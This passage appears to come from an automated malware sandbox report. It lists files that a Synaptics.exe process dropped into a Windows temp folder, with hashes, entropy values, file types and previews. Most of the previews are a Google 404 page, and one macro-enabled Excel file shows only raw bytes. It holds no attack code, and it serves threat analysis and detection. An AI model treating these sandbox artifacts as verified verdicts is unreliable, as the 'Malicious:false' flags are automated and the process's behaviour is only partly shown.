                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="u8BVzQbQpWzGxi8SM6pu-A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\ILuh4QM.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.259679761119962
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0h7xSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+gN+pAZewRDK4mW
                                                                                                                                      MD5:92C96259F86EDDB3F4562F6F3ED0D111
                                                                                                                                      SHA1:5D94F16CAFD2C46BAF99FA2EF02682CBB5282BF2
                                                                                                                                      SHA-256:CDDF29C4A6BC6A5659B8F8CA01582DD36C21E0F80FAB5F819AC201A41C783730
                                                                                                                                      SHA-512:1742415C012999381E0588B030BBD2D54C15163C89AE2FB942BDA3CEF0AAE60C96A49B79BCD9701104A5F9B5567C600A5EB4C1F0A77FEA2FFF5DB32033DA270B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="T6O0fIwif5hyY6uYuU7mdQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\LtpuUdm.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.251809580166545
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+04SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+b+pAZewRDK4mW
                                                                                                                                      MD5:F79FCC2B4DB82F2ACDE62D09FB7FD6D1
                                                                                                                                      SHA1:82383C84563BD629AC698CA2C2A6C07A2565D318
                                                                                                                                      SHA-256:67CB86C79965E026EDFB7C0C3BB362E2DDF40656D8D4B90CDEC5FEC0D45F7E3E
                                                                                                                                      SHA-512:A19B7FBA600F3DDE8C517F5823B48C4BE2340C701DFEA0191B9B114A6704413D18F7940F4FCBE80716B16A979A150340885579FCFE20E3BFD6FB6FF051BE194D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="_ogbHurQbBlg1UXTjcoyAw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\NVnHv1j.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.257960373783056
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0PSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+4+pAZewRDK4mW
                                                                                                                                      MD5:105FFE14D3CCE7C6673B1A14D5D32050
                                                                                                                                      SHA1:DC184F7DC6F31EFB9123F09ACD1208EFFB79B5BE
                                                                                                                                      SHA-256:6143EB6A3C737A788BD285EA8EBEC29319D43996DE27468425EC748E1FCD5E99
                                                                                                                                      SHA-512:A134E1B4A1AC23B203D4F67E0E27DEDDBDA9C85BDE9ACC1182A5A4C441024AC3CDA49FE8D1FB2C8CE2F3A5F3E0343580009FF1974614C09596047A374DD04782
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2sX1_UiKoKbuZDWnzaBeOg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\OdCVkOf.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.254557046325457
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0FSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+S+pAZewRDK4mW
                                                                                                                                      MD5:862FABC491E7FF5520E09964BD955982
                                                                                                                                      SHA1:DB95841A156D08127E39AB639A9A7F946E700A0B
                                                                                                                                      SHA-256:CF58A1EF74423A6E0692427673A8A1ABA7A96721D5CEEDD4C76571D583A66492
                                                                                                                                      SHA-512:63DD535DE9B42794A26AF1D4B6D919363030258A057A0D3B81A6B3D1AE1A363E690A7D9440E903196A4B8BD9F32072A555DD7D09C840A0BD05F42F5047EAF5C6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="4yvbscNa6A9Sa6DowZ8mlg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\Phh9wIC.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.265900182799788
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0nSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+U+pAZewRDK4mW
                                                                                                                                      MD5:0AB8A80F84E184565CE29651EAB547EA
                                                                                                                                      SHA1:ADE9E98FA2620C1E771F974B7CA68756184F8679
                                                                                                                                      SHA-256:64C3D4CBB93D531FF561A5A699E73E676802A55CDE43B408C7CBD26CF0FF8F76
                                                                                                                                      SHA-512:05AC9E07800E65968429FAEB158C17FDB9A72C26335823554CA6CDF0DFBDD85581219DCCAB604DFF256670E1063FC1A6743BB692C72C68069DF3864DAE173A76
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="QM_MstKYbMg-NB9qJh-qMw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\SzZ8DOq.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.257758053136788
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0PSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+8+pAZewRDK4mW
                                                                                                                                      MD5:7DFBA15F3D69C81E3BC8259E7547AD22
                                                                                                                                      SHA1:6A7A5525B2D1401EBFC8B919AAF05766FAE132C6
                                                                                                                                      SHA-256:3C2EDA7659F8B94B96CBA33701CDD1954A006F3925892B35E4EA2C18FCA5BFDF
                                                                                                                                      SHA-512:FE07F47D90065104FA78FC0B06BD080C8131FC51AB663359811856598B7139305B783FE25A6EC61BD04E517113550A9B6DCABC854554E9C5E2F71FD41CFB2DD4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="CJQ0jyaw2nF2eS58W16tmw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\UWDO6Ps.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.260759058062482
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0mvXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+5vX+pAZewRDK4mW
                                                                                                                                      MD5:C5AF4BDCBC7EC3C214433D0B91C38843
                                                                                                                                      SHA1:909966E31D9725C5B6053C88999D4663843CF625
                                                                                                                                      SHA-256:5288428F2CEEB7A8584098F7D46F525FA6F58936C1A6DE135432AF546E1D2714
                                                                                                                                      SHA-512:2230BB3C07A68D2C1C93D12619FFC5BD38CA4BC4F26B0B62BA525D2141C0F04DD9EFA595DB4EC4AF7F19542080273714FC21469E7A906652579E48343B9A4638
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="bbQ0QjuI8LlHuH5u2wqJ5w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\WiQrlzt.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.274085954822836
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0o5pDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+hD+pAZewRDK4mW
                                                                                                                                      MD5:BBB627F18CC1C4EB61F6D48AB95C9572
                                                                                                                                      SHA1:58A09A2C761F5399648B72AEA88DB67D86DFE77C
                                                                                                                                      SHA-256:2E28D0CD635819DCDEF0F0CA5B2DC057F2554B6AA444334FFB5D0D037D64DFB9
                                                                                                                                      SHA-512:0ECFB3D84EB7FBCE64BF75A61AB727C39F0F39A573DF4020DB6692B6AF100A9D89A3669B4A8A719395777206D4AFC9E516D70AC87BB11074D954A8834DCAEBF1
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="q1dOIWeYI7qNDzAQY_nK7w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\XJVR1Oh1.xlsm

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:Microsoft Excel 2007+
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):18387
                                                                                                                                      Entropy (8bit):7.523057953697544
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                      MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                      SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                      SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                      SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                                      C:\Users\user\AppData\Local\Temp\XjUkcmS.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.268024354709191
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0n2gSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+i+pAZewRDK4mW
                                                                                                                                      MD5:BFCA5A391CE93764B3609BB45DCBD095
                                                                                                                                      SHA1:9AAEA140F10E9F7ABFFE4724EDE946AF4033CB18
                                                                                                                                      SHA-256:0ADBD0287E7E719B64D4B28262B9C40B498A992AE9C547545CF3F9D717801A03
                                                                                                                                      SHA-512:89820D72B4B2AD0FFCEAB6E81C190501849F247E5004EEC48819C68E6CC1CF7648BB742D312E7269E930E0A76A81D4609154CE2FF897F34D8347AB5858D7D0B7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="v99cCJy_YNYAZgjbusUE1w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\Xs9O227.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.271539013258137
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+00ISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+m+pAZewRDK4mW
                                                                                                                                      MD5:82AAD13C8C340D5CACB8A66B6B599A5E
                                                                                                                                      SHA1:8D2BE7AA7F4B54D37964274CF17F32733B3D0854
                                                                                                                                      SHA-256:F596449C2D62A8D0ABF4980AB98CED9566CDE50B7E03CDCF45A9E9B6E233A037
                                                                                                                                      SHA-512:6C732FC05C44B12949C973891C835C967695BEB9C919D35787BF43B9372A8BCD9EC6F070CD6172946FA6EEAA2C520B9D6B4E442957CDCED6B47FCD510BB73665
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="YHXJaCfUXwysDRMjg2WmNg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\Y5h82sG.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.266305210375949
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0e+SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+X++pAZewRDK4mW
                                                                                                                                      MD5:86B2F76ACC33E4C14404FDA538C9A99B
                                                                                                                                      SHA1:57735DB0FA0B030782B4D8F54AA2B11D41ED66C5
                                                                                                                                      SHA-256:3194FD0DA4052968C9407CE74AAE8E21358AD0C1C6D25C6B227B4AA16E6902A6
                                                                                                                                      SHA-512:492D0E9BE047F991A8BD2B86218EB7C3D487FCC6D2598DE6D815597BC6547C38E180F630D9719D3EE5360846FF1353CF52BC7F54205097ED9086A2321D2F16A3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2Y2lY-lR3s3jXL7CCMRJcg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\bBKnKn1.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.256461050563257
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0rDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+E+pAZewRDK4mW
                                                                                                                                      MD5:56AF9FBC77A85C15EB11FC5D49984C39
                                                                                                                                      SHA1:13161D006700B5B433A4F4DF705A3CCB1852CDDB
                                                                                                                                      SHA-256:CAA4C730EFF7DD08C3CFDD5302A62C9ABBC99E21395F5EC1684A3517B10BFD87
                                                                                                                                      SHA-512:5AA73E5906DF2AE808B9140BA4C0CB89F00257E2938EABF2CF740963948BA459C2CAFD9C54C74FF56EFE5460D2F622C47594BCAA5C7D3F8B1FE978671E474561
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gKTJtkftCN9-wMC8Qe7rsw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\dl5hvVo.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.2688500802331815
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0AYSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+C+pAZewRDK4mW
                                                                                                                                      MD5:928EA4BEC0BD7F8064E04B373B5AE6D1
                                                                                                                                      SHA1:7641D06E1AECC829CB24724F622F0B56AAA6DD40
                                                                                                                                      SHA-256:0CC71438EDA68E33E8819A4637082F6B1ECCA9EDB39CC538F4BC47E362EE4850
                                                                                                                                      SHA-512:0D4FB5477AA5C27B242B6A9430CFE2E096FA626592382027667F28F0C7243413E6E2B40C77116493D73ACE2BB9158921FD308E3E6A9CB378EEC3A538E0D100A4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="4NbG1olVMuSHHgF4QwTUYA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\fMjtTKV.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
